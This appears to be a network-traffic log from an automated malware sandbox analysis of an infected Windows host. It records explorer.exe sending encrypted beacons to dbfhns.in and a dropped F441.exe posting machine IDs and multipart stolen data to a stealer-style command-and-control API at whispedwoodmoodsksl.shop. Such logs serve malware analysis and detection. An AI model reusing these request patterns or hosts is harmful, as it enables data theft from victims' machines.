                                                                              May 26, 2024 10:25:22.040106058 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://iymhuqeqmdev.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 127
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:25:22.040106058 CEST | 127 | OUT | Data Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 74 14 e7 9b
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vutiMAk|j][q<f%]6(fX
                                                                              May 26, 2024 10:25:22.960156918 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:25:22 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              28 | 192.168.2.4 | 52741 | 185.18.245.58 | 80 | 2580 | C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:25:29.338723898 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://rscrbtwfrpl.net/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 350
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:25:29.338725090 CEST | 350 | OUT | Data Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4c 17 c1 f5
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vuLz\`zx_62 0qK!S/4/]O+BS|'`>B|C;2j;HJHF$aoWV>$PHC
                                                                              May 26, 2024 10:25:30.271692991 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:25:30 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              29 | 192.168.2.4 | 52742 | 185.18.245.58 | 80 | 2580 | C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:25:34.563116074 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://feebaxojoajqvghx.net/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 325
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:25:34.563116074 CEST | 325 | OUT | Data Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4c 42 e9 8e
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vuLBMH|i:|Iqr~5g=Vy*JLoW]8x|wYs1=rXN\C0'$w2A*@&DW1
                                                                              May 26, 2024 10:25:35.492666006 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:25:35 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              30 | 192.168.2.4 | 52743 | 185.18.245.58 | 80 | 2580 | C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:25:39.806022882 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://flowliaawjqccjvx.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 336
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:25:39.806057930 CEST | 336 | OUT | Data Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4b 43 d2 b7
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vuKCcCGna[KA0PuV9X#e(?\$n)#U\,-u|.N'R2WgT!^V"%,MLGU`oKkUP,
                                                                              May 26, 2024 10:25:40.744919062 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:25:40 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              31 | 192.168.2.4 | 52744 | 185.18.245.58 | 80 | 2580 | C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:25:47.428708076 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://dnklpspcfvmivsa.net/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 239
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:25:47.428708076 CEST239OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 58 51 f9 e7
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vuXQx{_xJ<`SC/gU)+UYQPrHDws&AF&M%X\3Aa[@)u5`$gyRki^Z6A
                                                                              May 26, 2024 10:25:48.374391079 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:25:48 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session ID: 32 | Source IP: 192.168.2.4 | Source Port: 52745 | Destination IP: 185.18.245.58 | Destination Port: 80 | PID: 2580 | Process: C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:25:52.705023050 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://juuhlbwtemhw.net/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 280
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:25:52.705023050 CEST280OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 25 0c ec fd
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vu%[E\w@di[dNd~h(mNGP]FY?<PM([cQH8XbN7lzD'">;cqTGwcdDI7
                                                                              May 26, 2024 10:25:53.651457071 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:25:53 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session ID: 33 | Source IP: 192.168.2.4 | Source Port: 52746 | Destination IP: 185.18.245.58 | Destination Port: 80 | PID: 2580 | Process: C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:25:58.714999914 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://uipcoqrcfmpaso.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 339
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:25:58.715032101 CEST339OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 29 28 b6 ab
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vu)(F|m\^XLPal )KDdYd).2eYW)jtr*e0NJG2bs,@yvmW4kb)8`
                                                                              May 26, 2024 10:25:59.643886089 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:25:59 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session ID: 0 | Source IP: 192.168.2.4 | Source Port: 49745 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 3192 | Process: C:\Users\user\AppData\Local\Temp\F441.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-26 08:22:34 UTC | 271 | OUT | POST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 8
                                                                              Host: whispedwoodmoodsksl.shop
                                                                              2024-05-26 08:22:34 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                              Data Ascii: act=life
                                                                              2024-05-26 08:22:35 UTC | 814 | IN | HTTP/1.1 200 OK
                                                                              Date: Sun, 26 May 2024 08:22:35 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=630b5kao97b72k97ukjpp2t1hb; expires=Thu, 19-Sep-2024 02:09:14 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6HxyLDbe3FPltHbOQ27vVpzqdNZzXKwQzJnUb6ADwkHM54DE3gBr2bDQLVv6DcTu4UlOirfqNW%2FpBCIIzwlJ5yQ7CEhZfS9kTPrkm2k9CnJ%2F%2B%2FTsbKV2mPXHMr6WqAksFiADVMNE%2FobitKY%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 889c5bb48ce642cb-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-05-26 08:22:35 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                              Data Ascii: 2ok
                                                                              2024-05-26 08:22:35 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID: 1 | Source IP: 192.168.2.4 | Source Port: 49747 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 3192 | Process: C:\Users\user\AppData\Local\Temp\F441.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-26 08:22:35 UTC | 272 | OUT | POST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 74
                                                                              Host: whispedwoodmoodsksl.shop
                                                                              2024-05-26 08:22:35 UTC74OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 73 77 67 35 45 47 2d 2d 26 6a 3d 38 62 61 63 36 34 34 31 36 36 63 64 64 32 32 30 34 64 30 66 61 33 30 36 31 37 32 62 30 32 35 34
                                                                              Data Ascii: act=recive_message&ver=4.0&lid=swg5EG--&j=8bac644166cdd2204d0fa306172b0254
                                                                              2024-05-26 08:22:36 UTC | 810 | IN | HTTP/1.1 200 OK
                                                                              Date: Sun, 26 May 2024 08:22:36 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=d5lnnh4s6jti6himstvt7pl9ga; expires=Thu, 19-Sep-2024 02:09:15 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PM81houEGMB%2B0SZRrz7GyIBCktYZLLiA9AuCktLqTZd6AWzUgh6fxFZukT55cytrJym7Wji9SPHuJ%2F9SUmXLrySUGE2%2BrD2g42tRuRPGR9yFzFNAp5XTBeaqDIRvkohh1D9FuqEfeDHcd5M%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 889c5bbb5baf4394-EWR
                                                                              alt-svc: h3=":443"; ma=86400


                                                                              Session ID: 2 | Source IP: 192.168.2.4 | Source Port: 49750 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 3192 | Process: C:\Users\user\AppData\Local\Temp\F441.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-26 08:22:38 UTC | 290 | OUT | POST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 18158
                                                                              Host: whispedwoodmoodsksl.shop
                                                                              2024-05-26 08:22:38 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 42 31 35 30 37 43 46 33 45 33 45 43 43 44 45 31 37 43 34 31 31 45 39 38 42 38 39 37 35 45 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1B1507CF3E3ECCDE17C411E98B8975E0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                                              2024-05-26 08:22:38 UTC2827OUTData Raw: 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16
                                                                              Data Ascii: MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3R?l
                                                                              2024-05-26 08:22:39 UTC | 816 | IN | HTTP/1.1 200 OK
                                                                              Date: Sun, 26 May 2024 08:22:39 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=o8aoi8bigksem8c8u5i81n6l36; expires=Thu, 19-Sep-2024 02:09:17 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0h8cXUnz%2FFo42vTLke%2FvayRBvHL6W%2BhKIm%2B2sIpfdSdAa2eijWKkuVzhpDppAD172dgnfth7yXPdW3ctQ5II%2BlphHwWaryNym%2FZoX6W31MSyT1pkuIN8xsXzvqh3WA1WRkEWqisK3PRTXnc%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 889c5bcaa81b428b-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-05-26 08:22:39 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                                              Data Ascii: fok 8.46.123.175
                                                                              2024-05-26 08:22:39 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              3 | 192.168.2.4 | 49751 | 188.114.96.3 | 443 | 3192 | C:\Users\user\AppData\Local\Temp\F441.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-26 08:22:40 UTC | 289 | OUT | POST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 8779
                                                                              Host: whispedwoodmoodsksl.shop
                                                                              2024-05-26 08:22:40 UTC | 8779 | OUT
                                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1B1507CF3E3ECCDE17C411E98B8975E0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                                              2024-05-26 08:22:41 UTC | 810 | IN | HTTP/1.1 200 OK
                                                                              Date: Sun, 26 May 2024 08:22:40 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=405i380i5fm68e53scjsqdmbhe; expires=Thu, 19-Sep-2024 02:09:19 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nv0I3K9hPFieosaeMe2grB4c1PPG6KfNnk%2BD4foKj8W2o2JTqXIvjs0q0rPRTnlgigOBZf1e%2FtjgCoMBICFxEulVWhWxY22WzfdV1YIXv%2BxE6fZocTTkZO2JOBrgAkmcHpiWu2S03L05p90%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 889c5bd568520c7a-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-05-26 08:22:41 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                                              Data Ascii: fok 8.46.123.175
                                                                              2024-05-26 08:22:41 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              4 | 192.168.2.4 | 49752 | 188.114.96.3 | 443 | 3192 | C:\Users\user\AppData\Local\Temp\F441.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-26 08:22:41 UTC | 290 | OUT | POST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 20432
                                                                              Host: whispedwoodmoodsksl.shop
                                                                              2024-05-26 08:22:41 UTC | 15331 | OUT
                                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1B1507CF3E3ECCDE17C411E98B8975E0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                                              2024-05-26 08:22:42 UTC | 816 | IN | HTTP/1.1 200 OK
                                                                              Date: Sun, 26 May 2024 08:22:42 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=k8gkfuh9iaimp82gqvg0cq05kv; expires=Thu, 19-Sep-2024 02:09:21 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LDMip76gK1acny1sHxuYDfxlh%2BL3jVg%2FDbckC5pCxjjB%2FMIoTFLnxxkW6FJTjCWWreT5li%2FY5xvlqssojeGjzxYX6wCYc7c6ndljK0FOy98hh4Vc8QYpNifFcrw5%2FKiAOm3x9%2FU6vAS26L0%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 889c5be05a831770-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-05-26 08:22:42 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                                              Data Ascii: fok 8.46.123.175
                                                                              2024-05-26 08:22:42 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              5 | 192.168.2.4 | 52653 | 188.114.96.3 | 443 | 3192 | C:\Users\user\AppData\Local\Temp\F441.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-26 08:22:43 UTC | 289 | OUT | POST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 7083
                                                                              Host: whispedwoodmoodsksl.shop
                                                                              2024-05-26 08:22:43 UTC | 7083 | OUT
                                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1B1507CF3E3ECCDE17C411E98B8975E0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                                              2024-05-26 08:22:44 UTC | 814 | IN | HTTP/1.1 200 OK
                                                                              Date: Sun, 26 May 2024 08:22:44 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=43egko5vtqq4f1lubt6kp7k9pr; expires=Thu, 19-Sep-2024 02:09:23 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k4Xfok6ZVDPP%2Bq8ohUCxZPscEFXaap%2BEfVOZu9LDGllCyL%2BaBCJoh5M4tmb9rXM0O1F3NEpaz2NQ%2FvU8po5jfvYnIeHPUpJ8nk1JKrnkiB%2FQqrg4AJOIjnS1MlJ1QSaVlIUaMtZUZkVy0wo%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 889c5bec2d2c4265-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-05-26 08:22:44 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                                              Data Ascii: fok 8.46.123.175
                                                                              2024-05-26 08:22:44 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              6 | 192.168.2.4 | 52659 | 188.114.96.3 | 443 | 3192 | C:\Users\user\AppData\Local\Temp\F441.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
